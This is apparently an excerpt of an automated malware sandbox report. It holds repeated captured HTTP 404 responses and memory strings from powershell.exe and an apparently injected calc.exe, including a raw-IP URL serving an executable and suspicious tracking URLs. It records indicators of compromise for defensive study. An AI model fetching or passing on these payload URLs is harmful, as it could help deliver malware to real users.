                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 00:20:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 00:20:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 17 Mar 2025 00:20:27 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 17 Mar 2025 00:20:30 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 17 Mar 2025 00:21:15 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 17 Mar 2025 00:21:18 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 17 Mar 2025 00:21:20 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 17 Mar 2025 00:21:23 GMT | Server: Apache/2 | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html;charset=utf-8 | vary: Accept-Encoding | server: DPS/2.0.0+sha-f393f2a | x-version: f393f2a | x-siteid: us-east-1 | set-cookie: dps_site_id=us-east-1; path=/ | content-encoding: br | date: Mon, 17 Mar 2025 00:21:43 GMT | keep-alive: timeout=5 | transfer-encoding: chunked | connection: close
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html;charset=utf-8 | vary: Accept-Encoding | server: DPS/2.0.0+sha-f393f2a | x-version: f393f2a | x-siteid: us-east-1 | set-cookie: dps_site_id=us-east-1; path=/ | content-encoding: br | date: Mon, 17 Mar 2025 00:21:45 GMT | keep-alive: timeout=5 | transfer-encoding: chunked | connection: close
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html;charset=utf-8 | vary: Accept-Encoding | server: DPS/2.0.0+sha-f393f2a | x-version: f393f2a | x-siteid: us-east-1 | set-cookie: dps_site_id=us-east-1; path=/ | content-encoding: br | date: Mon, 17 Mar 2025 00:21:48 GMT | keep-alive: timeout=5 | transfer-encoding: chunked | connection: close
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html;charset=utf-8 | content-length: 189878 | vary: Accept-Encoding | server: DPS/2.0.0+sha-f393f2a | x-version: f393f2a | x-siteid: us-east-1 | set-cookie: dps_site_id=us-east-1; path=/ | date: Mon, 17 Mar 2025 00:21:51 GMT | keep-alive: timeout=5 | connection: close
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Mon, 17 Mar 2025 00:22:10 GMT | transfer-encoding: chunked | connection: close
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Mon, 17 Mar 2025 00:22:12 GMT | transfer-encoding: chunked | connection: close
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Mon, 17 Mar 2025 00:22:15 GMT | transfer-encoding: chunked | connection: close
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Mon, 17 Mar 2025 00:22:17 GMT | transfer-encoding: chunked | connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 17 Mar 2025 00:22:37 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 17 Mar 2025 00:22:40 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 17 Mar 2025 00:22:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 17 Mar 2025 00:22:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004B88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.245.123.24/530/cosses
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1495054973.0000000006CAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.123.24/530/cosses.exe
                  Source: powershell.exe, 00000003.00000002.1494979648.0000000006C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.123.24/530/cosses.exeb
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://digi-searches.com/Artistic.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnCkE8mXhD1lJ7w
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://digi-searches.com/Asian_Art.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnCkE8mXhD1lJ7
